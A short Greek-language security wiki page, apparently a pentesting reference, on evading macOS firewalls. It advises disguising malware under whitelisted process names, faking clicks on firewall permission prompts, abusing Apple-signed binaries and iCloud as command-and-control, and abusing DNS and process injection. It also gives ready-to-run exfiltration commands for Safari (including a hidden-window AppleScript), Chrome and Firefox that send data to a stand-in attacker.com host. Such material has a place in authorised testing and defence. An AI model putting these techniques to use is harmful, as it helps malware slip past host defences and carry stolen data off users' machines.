macOS Bypassing Firewalls

Εντοπισμένες τεχνικές

Οι παρακάτω τεχνικές βρέθηκαν να λειτουργούν σε μερικές εφαρμογές τοίχων πυρασφάλειας του macOS.

Κατάχρηση ονομάτων λευκής λίστας

• Για παράδειγμα, να ονομάζετε το malware με ονόματα γνωστών διεργασιών του macOS όπως launchd

Συνθετικό Κλικ

• Εάν ο τοίχος πυρασφάλειας ζητά άδεια από τον χρήστη, κάντε το malware να κάνει κλικ στο επιτρέπω

Χρήση υπογεγραμμένων δυαδικών αρχείων της Apple

• Όπως το curl, αλλά και άλλα όπως το whois

Γνωστοί τομείς της Apple

Ο τοίχος πυρασφάλειας μπορεί να επιτρέπει συνδέσεις σε γνωστούς τομείς της Apple όπως το apple.com ή το icloud.com. Και το iCloud μπορεί να χρησιμοποιηθεί ως C2.

Γενική Παράκαμψη

Μερικές ιδέες για να προσπαθήσετε να παρακάμψετε τους τοίχους πυρασφάλειας

Έλεγχος επιτρεπόμενης κίνησης

Γνωρίζοντας την επιτρεπόμενη κίνηση θα σας βοηθήσει να αναγνωρίσετε πιθανώς τους τομείς που βρίσκονται στη λευκή λίστα ή ποιες εφαρμογές έχουν άδεια πρόσβασης σε αυτούς.

lsof -i TCP -sTCP:ESTABLISHED

Κατάχρηση DNS

Οι αναλύσεις DNS γίνονται μέσω της υπογεγραμμένης εφαρμογής mdnsreponder που πιθανόν να επιτραπεί να επικοινωνήσει με διακομιστές DNS.

Μέσω εφαρμογών Περιηγητή

• oascript

tell application "Safari"
run
tell application "Finder" to set visible of process "Safari" to false
make new document
set the URL of document 1 to "https://attacker.com?data=data%20to%20exfil
end tell

• Google Chrome

"Google Chrome" --crash-dumps-dir=/tmp --headless "https://attacker.com?data=data%20to%20exfil"

• Firefox

firefox-bin --headless "https://attacker.com?data=data%20to%20exfil"

• Safari

open -j -a Safari "https://attacker.com?data=data%20to%20exfil"

Μέσω ενσωμάτωσης διεργασιών

Εάν μπορείτε να ενθέτετε κώδικα σε μια διεργασία που έχει άδεια να συνδεθεί σε οποιονδήποτε διακομιστή, μπορείτε να παρακάμψετε τις προστασίες του τοίχου προστασίας:

Αναφορές

• https://www.youtube.com/watch?v=UlT5KFTMn2k